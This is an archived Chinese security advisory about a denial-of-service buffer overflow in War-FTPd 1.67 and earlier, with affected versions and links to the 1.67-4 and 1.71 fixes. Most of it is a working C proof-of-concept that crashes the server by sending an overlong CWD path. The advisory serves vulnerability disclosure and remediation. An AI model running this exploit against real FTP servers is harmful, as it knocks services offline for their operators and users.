首页 -> 安全研究
安全研究
安全漏洞
War-FTPd 1.6x CWD/MKD 拒绝服务漏洞
发布日期:2000-02-04
更新日期:2000-02-04
受影响系统:
Jgaa WarFTPd 1.67-3不受影响系统:
Jgaa WarFTPd 1.66x4s
Jgaa WarFTPd 1.71描述:
Jgaa WarFTPd 1.67-4
来源:Toshimi Makino <crc@sirius.imasy.or.jp>
War-FTPd 1.67及以前版本容易受到缓冲区溢出拒绝服务攻击。
由于程序代码在处理MKD和CWD命令时缺乏边界检查,通过向这两个命令传送超长的路径名作为参数时可远程使服务器崩溃。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*--------------------------------------------------------------*/
/* war-ftpd 1.66x4s and 1.67-3 DoS sample by crc "warftpd-dos.c"*/
/*--------------------------------------------------------------*/
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>
#define FTP_PORT 21
#define MAXBUF 8182
//#define MAXBUF 553
#define MAXPACKETBUF 32000
#define NOP 0x90
void main(int argc,char *argv[])
{
SOCKET sock;
unsigned long victimaddr;
SOCKADDR_IN victimsockaddr;
WORD wVersionRequested;
int nErrorStatus;
static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
hostent *victimhostent;
WSADATA wsa;
if (argc < 3){
printf("Usage: %s TargetHost UserName Password\n",argv[0]); exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
nErrorStatus = WSAStartup(wVersionRequested, &wsa);
if (atexit((void (*)(void))(WSACleanup))) {
fprintf(stderr,"atexit(WSACleanup)failed\n"); exit(-1);
}
if ( nErrorStatus != 0 ) {
fprintf(stderr,"Winsock Initialization failed\n"); exit(-1);
}
if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
fprintf(stderr,"Can't create socket.\n"); exit(-1);
}
victimaddr = inet_addr((char*)argv[1]);
if (victimaddr == -1) {
victimhostent = gethostbyname(argv[1]);
if (victimhostent == NULL) {
fprintf(stderr,"Can't resolve specified host.\n"); exit(-1);
}
else
victimaddr = *((unsigned long *)((victimhostent->h_addr_list)[0]));
}
victimsockaddr.sin_family = AF_INET;
victimsockaddr.sin_addr.s_addr = victimaddr;
victimsockaddr.sin_port = htons((unsigned short)FTP_PORT);
memset(victimsockaddr.sin_zero,(int)0,sizeof(victimsockaddr.sin_zero));
if(connect(sock,(struct sockaddr *)&victimsockaddr,sizeof(victimsockaddr)) == SOCKET_ERROR){
fprintf(stderr,"Connection refused.\n"); exit(-1);
}
printf("Attacking war-ftpd ...\n");
recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
sprintf((char *)packetbuf,"USER %s\r\n",argv[2]);
send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
sprintf((char *)packetbuf,"PASS %s\r\n",argv[3]);
send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0;
sprintf((char *)packetbuf,"CWD %s\r\n",buf);
send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
Sleep(100);
shutdown(sock, 2);
closesocket(sock);
WSACleanup();
printf("done.\n");
}
建议:
1.67-4版本已修补了这个漏洞,下载网址:
http://war.jgaa.com/alert/files/ward167-4.zip
另外,升级到1.71版本也能修补这个漏洞,下载网址:
http://war.jgaa.com/alert/files/ward171-0.zip
浏览次数:7132
严重程度:0(网友投票)
绿盟科技给您安全的保障